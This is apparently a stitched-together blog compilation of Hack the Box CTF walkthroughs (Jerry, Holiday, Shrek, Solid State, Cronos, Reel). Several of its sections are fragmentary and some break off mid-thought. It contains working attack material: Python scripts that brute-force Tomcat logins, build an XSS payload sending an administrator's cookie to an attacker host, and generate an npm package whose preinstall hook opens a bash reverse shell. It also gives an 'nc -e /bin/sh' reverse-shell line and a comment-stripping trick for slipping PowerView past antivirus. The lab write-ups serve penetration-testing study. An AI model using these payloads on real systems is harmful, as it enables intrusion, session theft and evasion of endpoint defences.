Month: November 2018

Today we are going to solve another CTF challenge, “Jerry”, which is available online for those who want to increase their skill in penetration testing. Jerry is a retired vulnerable lab presented by Hack the Box.

I then access the Tomcat web page at http://10.10.10.95:8080. From here I turn to Google to find documentation on Tomcat's administration portal.

After some searching I learn that Tomcat does not call its administrators admins; it calls them managers, and the manager application is reachable at http://10.10.10.95:8080/manager/html

It is worth trying to log in with default or common credentials, and @danielmiessler's SecLists contains a comprehensive list of Tomcat credentials:
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
As this list contains 79 credential pairs it is worth scripting the attempts.
The script “tomcat-brute.py” was used for this.
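The page does not show tomcat-brute.py, so here is an added example of the same idea (my code, not the post's script): it parses the SecLists user:password format, sends each pair as HTTP Basic auth to the manager URL and stops at the first 200. The HTTP call is a parameter so the logic can be checked without a live Tomcat; the default transport is urllib. The sample credential text in the test is constructed.

```python
"""Try a list of Tomcat manager credentials against /manager/html.

Tomcat's manager app uses HTTP Basic auth: 401 means wrong credentials,
403 means the user exists but lacks the manager-gui role, 200 means success.
"""
import base64
import urllib.error
import urllib.request


def parse_credlist(text):
    """Turn 'user:password' lines into (user, password) pairs, skipping blanks and comments."""
    creds = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, _, password = line.partition(":")
        creds.append((user, password))
    return creds


def basic_auth_header(user, password):
    """Authorization header value for HTTP Basic auth."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def urllib_status(url, auth_header):
    """Default transport: HTTP status code of a GET carrying the given Authorization header."""
    req = urllib.request.Request(url, headers={"Authorization": auth_header})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def find_valid_credentials(url, credlist_text, status_fn=urllib_status):
    """Return the first (user, password) that is accepted (HTTP 200), or None."""
    for user, password in parse_credlist(credlist_text):
        if status_fn(url, basic_auth_header(user, password)) == 200:
            return (user, password)
    return None


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.10.95:8080/manager/html"
    wordlist = sys.argv[2] if len(sys.argv) > 2 else "tomcat-betterdefaultpasslist.txt"
    with open(wordlist) as fh:
        print("valid:", find_valid_credentials(target, fh.read()))
```

Run it as `python3 tomcat-brute.py http://10.10.10.95:8080/manager/html tomcat-betterdefaultpasslist.txt`. Treat a 403 as a partial hit: the account is real, it just cannot reach the HTML manager.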

I soon realize that the manager application only deals in *.war files, so that is the only type I can upload. After some research I learn that I can create such a payload with Metasploit. I create a *.war payload using the command:

I then upload the file and click Start to deploy the application. Next I start a netcat listener with: # nc -nvlp 443
so that the payload has something to connect back to and I get a reverse shell.
I then go back to the site and request http://10.10.10.95:8080/shell/wxiucdkyhxeetnn.jsp
Remember that the *.jsp file name is the one extracted earlier from shell.war; the generated WAR contains a randomly named JSP.

Today we are going to solve another CTF challenge, “Holiday”, which is available online for those who want to increase their skill in penetration testing. Holiday is a retired vulnerable lab presented by Hack the Box.

Level: Expert !!

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

nmap -A -p- 10.10.10.25 --open

From the image below, you can see that ports 22 and 8000 are open on the target system.

As port 8000 is running HTTP, we open the IP address in the browser and find a web page.

We don't find anything on the page, so we use dirb to enumerate directories.


dirb http://10.10.10.25:8000

The dirb scan gives us a directory called /login; we open it and find a login page.

We capture the login request with Burp Suite, using random credentials as placeholders.

We use sqlmap to check whether the login is vulnerable to SQL injection. It is, so we use sqlmap to dump the database and find a username, “RickA”, and a password hash.

We use hashkiller.co.uk to crack the hash and recover the user's password: nevergonnagiveyouup

We log in with these credentials and are redirected to a page that appears to contain user information.

We click one of the UUID links and find a page where we can post notes for the users. It also states that it can take up to one minute for a note to be posted.

We try to exploit the note function and find that it is vulnerable to XSS. Since the notes are read by the administrator, XSS can be used to steal the admin's cookie. To get our payload past the filter we encode it with the JavaScript function String.fromCharCode; I wrote a small script to convert the payload string into character codes.

To bypass the filter, we post the note with this payload:


<img src="x/><script>eval(String.fromCharCode(<payload>));</script>">
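An added example (my code, not the script the post mentions) that does the String.fromCharCode encoding and wraps the result in the note payload above. The JavaScript it encodes sends the victim's document.cookie to a listener; the attacker address 10.10.14.5 is an assumption, replace it with your own.

```python
"""Encode a JavaScript payload as String.fromCharCode(...) for a filtered XSS sink.

The filter in the note form blocks quotes and keywords; a comma-separated list of
decimal char codes contains only digits and commas, so it passes, and eval()
turns it back into the original script in the administrator's browser.
"""


def to_charcodes(payload):
    """Comma-separated decimal code points, the argument list String.fromCharCode() expects."""
    return ",".join(str(ord(c)) for c in payload)


def decode_charcodes(codes):
    """Inverse of to_charcodes; handy for reading a captured payload."""
    return "".join(chr(int(n)) for n in codes.split(",") if n.strip())


def cookie_stealer_js(attacker):
    """JS that redirects the admin's browser to our listener with the cookie in the query string."""
    return f"document.location='http://{attacker}/?c='+document.cookie"


def build_note(js):
    """Wrap encoded JS in the img/script structure that gets through the note filter."""
    return ('<img src="x/><script>eval(String.fromCharCode('
            + to_charcodes(js) + '));</script>">')


if __name__ == "__main__":
    # 10.10.14.5 is an assumed attacker address; port 80 matches the nc listener used below.
    print(build_note(cookie_stealer_js("10.10.14.5")))
```

Paste the printed string into the note body; when the administrator's browser renders the note, the request to port 80 carries the session cookie.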

We set up a listener with nc on port 80, as the administrator's browser will send a request to this port that includes the administrator's cookie.


nc -lvp 80

After waiting for about a minute we receive the admin cookie.

The cookie is URL-encoded; we decode it and use it to hijack the administrator's session.

We capture a request to the web page with Burp Suite, replace our cookie with the administrator's and forward it.

As soon as we forward the request, we have successfully hijacked the administrator session.

We now browse to the /admin directory and find a page with options to export bookings and notes.

We capture the export request with Burp Suite and test it for injection. After some enumeration we find that the page is vulnerable to command injection.

We are unable to get a shell with Metasploit's web_delivery module because of filtering. Instead we create a payload with msfvenom, upload it to the target through the command injection and use it to get a reverse shell.

We execute the uploaded payload through the command injection vulnerability and immediately receive a reverse shell.

We spawn a TTY shell and check the sudoers list, finding that we can run /usr/bin/npm i * as root without a password.

python -c "import pty; pty.spawn('/bin/bash')"
sudo -l

Before trying for a root shell we enumerate the rest of the file system and find user.txt in /home/algernon. Reading it gives us the first flag.

Now for root.txt: we go to the /app directory, rename package.json to pack and symlink /root/root.txt to package.json.

ln -s /root/root.txt package.json

We run /usr/bin/npm i * as root; npm tries to parse the symlinked file as package.json, and the parse error it prints includes the file's contents, revealing the final flag.

Searching Google, we find a way to get a reverse shell using a package called rimrafall.

We set up rimrafall by following the instructions on its page.

We edit the package.json and change the preinstall script to a bash reverse-shell one-liner.

We run the install as root to get a privileged shell:

sudo npm i rimrafall --unsafe
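The whole trick is that npm runs lifecycle scripts from package.json as the installing user, so a sudoers rule for npm i * is root. As an added example (my code, modelled on the rimrafall idea, not the rimrafall package or the post's own files), this builds a local package whose preinstall hook is a bash reverse shell, and also shows the check a defender would run on a package before installing it. The listener address 10.10.14.5:1234 is an assumption.

```python
"""Build an npm package with a malicious preinstall hook, and audit package.json for hooks."""
import json
import os

# Scripts npm runs automatically around install/uninstall, as the installing user.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                   "preuninstall", "postuninstall")


def reverse_shell_cmd(lhost, lport):
    """Bash one-liner that npm hands to `sh -c` when the hook fires."""
    return f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"


def build_package(name, lhost, lport):
    """package.json contents: a name, a version and the preinstall hook are all that is needed."""
    return {
        "name": name,
        "version": "1.0.0",
        "description": "preinstall hook demo",
        "scripts": {"preinstall": reverse_shell_cmd(lhost, lport)},
    }


def package_json_text(name, lhost, lport):
    return json.dumps(build_package(name, lhost, lport), indent=2)


def write_package(directory, name, lhost, lport):
    """Write <directory>/package.json; `sudo npm i <directory>` then runs the hook as root."""
    os.makedirs(directory, exist_ok=True)
    path = os.path.join(directory, "package.json")
    with open(path, "w") as fh:
        fh.write(package_json_text(name, lhost, lport))
    return path


def find_lifecycle_hooks(package_json):
    """Defensive check: (hook, command) pairs that would execute during npm install."""
    scripts = json.loads(package_json).get("scripts", {})
    return [(hook, scripts[hook]) for hook in LIFECYCLE_HOOKS if hook in scripts]


if __name__ == "__main__":
    # Assumed listener: nc -nvlp 1234 on 10.10.14.5.
    path = write_package("rimrafall", "rimrafall", "10.10.14.5", "1234")
    with open(path) as fh:
        print(find_lifecycle_hooks(fh.read()))
```

On the defensive side, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops lifecycle hooks from running at all, and a sudoers entry that hands npm to an unprivileged user should be treated as equivalent to granting root.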

With our listener already running, the preinstall script executes as soon as the install starts and we get a reverse shell.

nc -nvlp 1234

We go to /root and find root.txt; reading it gives us the final flag.

Today we are going to solve another CTF challenge, “Shrek”, which is available online for those who want to increase their skill in penetration testing. Shrek is a retired vulnerable lab presented by Hack the Box.

After setting the key's permissions to 600 we use this RSA key to log in as the user sec, whom we found earlier, with the passphrase recovered before. Once logged in we go to /home/sec, where we find user.txt; opening it gives us the first flag.

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
The /usr/src folder is writable by the sec user and contains a thoughts.txt file owned by root.
Creating a file there reveals (after a short delay) that a scheduled task runs chown * in the directory. Using the wildcard trick from the paper above, we can make chown use a reference file and apply that file's owner:group to everything in the directory: the command touch -- --reference=thoughts.txt creates a file whose name is passed to chown as an argument when the glob expands, and chown parses it as the --reference option.
Once that is in place, we create a binary, set its SUID bit and wait for the task to chown it; after the task runs, we can execute code as root.
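To make the mechanics concrete, here is an added example (my code, not from the post) that simulates the two halves of the trick in a temporary directory: the shell expanding * into a sorted list of file names, and GNU getopt pulling anything that starts with - out of that list as an option. It does not run chown; the owner argument nobody:nobody for the cron job is an assumption, since the post only says it runs chown *.

```python
"""Simulate wildcard argument injection against `chown <owner> *`."""
import os
import tempfile


def plant_reference_file(directory, reference):
    """Create a file literally named --reference=<reference>, like `touch -- --reference=thoughts.txt`."""
    name = f"--reference={reference}"
    open(os.path.join(directory, name), "a").close()
    return name


def shell_glob(directory):
    """What `*` expands to: non-hidden entries, sorted (codepoint order here, like the C locale)."""
    return sorted(e for e in os.listdir(directory) if not e.startswith("."))


def getopt_split(argv):
    """Mimic GNU getopt permutation: anything starting with '-' before a bare '--' is an option,
    wherever it appears in argv; '-' alone and everything after '--' are operands."""
    options, operands, end_of_opts = [], [], False
    for arg in argv:
        if end_of_opts or arg == "-" or not arg.startswith("-"):
            operands.append(arg)
        elif arg == "--":
            end_of_opts = True
        else:
            options.append(arg)
    return options, operands


def simulate_cron_chown(directory, owner="nobody:nobody"):
    """Return (options, operands) as chown would see them for `chown <owner> *` run in directory.
    With --reference present, chown ignores the owner operand as a target (it fails to stat it,
    reports the error and continues) and copies the reference file's owner:group to the rest."""
    argv = [owner] + shell_glob(directory)
    return getopt_split(argv)


def demo(reference="thoughts.txt"):
    """Self-contained run: a stand-in for root's thoughts.txt, our SUID binary, and the planted name."""
    directory = tempfile.mkdtemp()
    for name in (reference, "shell"):
        open(os.path.join(directory, name), "a").close()
    plant_reference_file(directory, reference)
    return simulate_cron_chown(directory)


if __name__ == "__main__":
    print(demo())
```

The fix on the cron side is to stop the glob from producing options at all: `chown nobody:nobody -- *` or `chown nobody:nobody ./*`, since getopt stops parsing at -- and ./--reference=... no longer starts with a dash.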

To exploit this we write a small C program on our own machine that reads root.txt from the root directory, then serve it with Python's SimpleHTTPServer module to transfer it to the target.

Today we are going to solve another CTF challenge, “Solid State”, which is available online for those who want to increase their skill in penetration testing. Solid State is a retired vulnerable lab presented by Hack the Box.

Cool, so we did find an E-Mail, and our target is likely a mail server. Maybe we’ll need this later, maybe not, might as well save it.

A quick search on Exploit-DB turns up a PDF showing how to achieve remote code execution on Apache JAMES: create the user ../../../../../../../../etc/bash_completion.d through JAMES Remote Admin, then send that user an e-mail with a command embedded in the body; the message is written into /etc/bash_completion.d and the command runs the next time a user logs in. We should keep this in the back of our mind for now and first check whether the default login for JAMES Remote Admin has been changed.

So right off the bat we can see our PATH is /home/mindy/bin and we cannot write to this environment variable. In addition, commands containing / are refused, so we cannot call a binary by its full path. Lastly we are locked into an rbash shell, which is also not writable. This is where the exploit mentioned earlier comes into play: we now have a user to log in with to trigger it, so we just need to prepare a bit.


Since we have enumerated the target and found Apache James Server 2.3.2 running, a search turns up the Exploit-DB module shown below; copy the whole Python code from there.

Paste the copied Python code into a text file, change the payload as highlighted in the image below and save it; ours is exploit.py on the desktop.

nc -e /bin/sh 10.10.14.3 8000

Here 10.10.14.3 is the attacker's IP and 8000 the port listening for the reverse connection from the target.

Done! The exploit only fires when someone logs in, so we log in over SSH again with Mindy's credentials, and as soon as we do the exploit runs, as shown below.

We open a netcat listener to catch the shell that the exploit hands us. To upgrade it to a proper terminal we spawn a pty with Python:

python -c "import pty; pty.spawn('/bin/bash')"

Lovely! We again have a shell on the victim's system, but this time it is a full TTY.

Now let's move on to the second challenge, root.txt. We are currently in Mindy's home directory with no obvious path to root. Then I recall that Mindy received a mail from the admin account sent by James; there is a chance James holds a hint, so I grep the process list for it:

ps aux | grep james

Here the aux flags mean:

a = display processes for all users
u = show the process's user/owner
x = show processes not attached to a terminal

Great! It shows a root process running from /opt.

I then move into /opt and run ls -al to explore all the files and folders inside it.

Lastly, we set up a listener; when the user mindy logs in over SSH the reverse shell executes. Below you can see the SSH output as rbash chokes on the serialized mail object.

➜ ~ ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan 26 23:20:16 2018 from 10.10.15.82
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
--trimmed due to size---

Note: if another user beat you to this exploit you can bypass rbash altogether by pressing CTRL+C a few times, making this whole process much quicker.

Moving on, let's see what we can figure out about the system. Grepping ps for James shows it running a bash script and a JVM from /opt. These are worth investigating, though poking around I wasn't able to find anything interesting.

Today we are going to solve another CTF challenge, “Cronos”, which is available online for those who want to increase their skill in penetration testing. Cronos is a retired vulnerable lab presented by Hack the Box.

The last scheduled activity executes a process called artisan located in /var/www/laravel.
When we check the file's permissions:

100755/rwxr-xr-x 1646 fil 2017-04-09 05:30:09 +0530 artisan

So we can replace this file with our payload:
Create a new payload and upload it here.
Rename it to artisan.
Make it executable with chmod +x artisan.
Put the second netcat listener in the background and wait for the new connection when the scheduled task runs.

Today we are going to solve another CTF challenge, “Reel”, which is available online for those who want to increase their skill in penetration testing. Reel is a retired vulnerable lab presented by Hack the Box.

Level: Intermediate

Task: find user.txt and root.txt file on victim's machine.

Let's begin with nmap port enumeration.

That's quite an interesting attack surface we have right here! There's no web service listening on this box, so right away we see this isn't going to be the typical web-app-exploit-then-root machine, which is cool!

Whenever I see FTP, the first thing I try is anonymous login, so let's go for that.

Hmm. Converting RTFs to what? DOCX maybe? Since the other documents in the directory are Microsoft Word documents, that seems a reasonable guess. I am unable to read Windows Event Forwarding.docx (LibreOffice errors out every time I try), but I have more luck with AppLocker.docx. It says:

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

OK, bad news. This probably means we will have to deal with AppLocker once we get a shell on the box. But we are far from that! So, now what?

The wonders of metadata

We have a good amount of information from our enumeration phase. Now it is time to craft a meticulously planned several-stage attack or to bang our heads against the machine until something works. Yay, hacking!

We know from our nmap scan that the server has an SMTP service listening on port 25, which stands out now because of the readme.txt we read earlier. So maybe we can use this SMTP server to send e-mails, but to whom?

Well, whoever wrote or converted the documents on the FTP server is probably a user of the machine and therefore a potential victim. So is there a chance her user account is somewhere in the generated documents?

Now, I have a confession to make. I don't usually mention it in my write-ups unless it gives useful information, but I run exiftool on almost EVERYTHING I find during reconnaissance, whether solving CTFs or doing a pentest. It's probably some kind of derangement from my first three or four CTF-like machines all involving metadata in images or documents.

So you can imagine I was really happy when I ran exiftool on the three documents and one of them was bingo:

We finally have a shell on this box. It's going to be easy from here, right? Of course, that malicious document was the peak of difficulty of this machine, was it not? (Narrator: again, it was not)

Normally my first serious move on landing on a Windows machine is running PowerUp.ps1, analyzing the results and working from there. But before that I like to peek around, at least in the home directory of the user I landed as. So, to C:\Users\nico\ we go!

On his Desktop, aside from the user.txt flag (yay!), there is an interesting file called cred.xml:

Hey, I know the type PSCredential! As the file name suggests, it probably contains credentials, and judging by its contents they belong to the user tom. That's great! It's only a matter of researching what kind of file this is and how to obtain the plain-text password from it. After a little googling, two StackOverflow answers help me understand that this file is the XML representation of a serialized PowerShell object, more specifically a PSCredential, and that the PowerShell cmdlet Import-Clixml can undo the process:

BloodHound is a tool that graphs the relationships between the objects of an Active Directory domain (users, groups, machines, etc.) and so highlights permission problems that can be chained into Domain Admin privileges. An explanatory video can be found on YouTube.

BloodHound has a graphical part. The other part, the ingestor, generates the CSV files from which the graphs are built:

The collection module can be called with finer options or run more exhaustively. Either way it writes CSV files to the current directory, which we quickly copy back to load into the BloodHound instance we installed and configured earlier.

BloodHound has a path-search feature, which here returns nothing from Tom to the Domain Admins group. But if we look at the rights we currently hold it gets interesting:

Here we have the WriteOwner right over the user Claire, which lets us set who owns that object.
It is also possible to find this relationship directly with PowerView:

A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut down.

We can then grant ourselves the privilege of adding members and add ourselves to the group:

No errors, seems good! We can check it worked by running net user claire and seeing that we are indeed a proud member of BACKUP_ADMINS. Great! Now what?

Note

At this point, while I was exploring Claire as a BACKUP_ADMINS member, other Hack The Box users were constantly resetting Claire's password to other values, so if I logged out (you will see why in a moment) I couldn't log back in. I ended up leaving Tom's SSH session open and prepared a script to automate resetting Claire's password to the value I wanted, so that if someone changed it I could easily change it back. My ResetClairePassword.ps1 script was like this:

Backup Admin

Another shameful confession. I wasted a lot of time at this point, and it was pretty frustrating. It had taken a lot of work to get here and it seemed to be for nothing: I couldn't access the Administrator home directory, I couldn't read or write any files beyond what base Claire could, and according to BloodHound BACKUP_ADMINS had no control over other AD objects. So, was all this work for nothing?!

It turns out you have to log out and log in again for group changes to take effect, because group membership is evaluated when the logon token is built. It's obvious, and I knew it from Linux (it works the same way there), but my tired brain couldn't remember it, which meant a lot of frustration and wasted time wandering around. Lesson learned (even though I thought I already knew this): if you are tired, take a break! Even if victory feels so near you could touch it, working with a tired mind almost never pays off.

OK, after this dramatic complication we can continue! Log out, log in again, and the group change takes effect. Now, as Claire, we can access C:\Users\Administrator. Finally! Let's read root.txt and claim our well-deserved prize:

Alright, it's just digging work at this point. After reviewing these scripts one by one (they seem to automate backing up some directories of the box), we finally find what we are looking for:

SEP immediately picked up on this and blocked the download of the script, throwing an exception on the DownloadString call. From this it is safe to assume the script is caught on download, not on execution. I went a step further and assumed there was some basic text, most likely in comments, that the signature used to identify PowerView.

Workaround

I used the following sed command to strip the block comments and create a new comment-free PowerView.ps1:

sed '/<#/,/#>/d' powerview.ps1 > new_powerview.ps1
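An added example (my code, not from the post) that does the same transformation in Python. It differs from the sed range in one way worth knowing: sed's range address only starts looking for the closing #> on the line after the one that matched <#, so a block comment that opens and closes on a single line makes sed delete everything down to the next #> it finds. The regex below matches the span itself, so single-line blocks are removed cleanly and code sharing a line with the comment survives. The sample script text is constructed for the demo.

```python
"""Strip PowerShell block comments (<# ... #>) from a script."""
import re

# Non-greedy across newlines: each <# pairs with the nearest following #>.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)


def strip_block_comments(text):
    """Remove every <# ... #> span, single-line or multi-line; '#' line comments are left alone."""
    return BLOCK_COMMENT.sub("", text)


def strip_file(src, dst):
    """Read src (tolerating a UTF-8 BOM, common in .ps1 files), write the stripped script to dst."""
    with open(src, encoding="utf-8-sig") as fh:
        cleaned = strip_block_comments(fh.read())
    with open(dst, "w", encoding="utf-8") as fh:
        fh.write(cleaned)
    return len(cleaned)


# Constructed sample: a help block, a line comment, and an inline block comment next to code.
SAMPLE = """<#
.SYNOPSIS
Demo help block
#>
function Get-Thing { # inline comment stays
    'thing' <# trailing block #> ; 'kept'
}
"""

if __name__ == "__main__":
    print(strip_block_comments(SAMPLE))
```

Usage: `python3 strip_comments.py` on its own prints the cleaned sample; call `strip_file("powerview.ps1", "new_powerview.ps1")` to process the real script before hosting it for DownloadString.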

The sed command leaves single-line comments in, but it turns out that is not where the signature is. After doing this SEP was perfectly happy to let me download and execute PowerView cmdlets. Out of curiosity I decided to drill down and identify the exact signature. Here it is: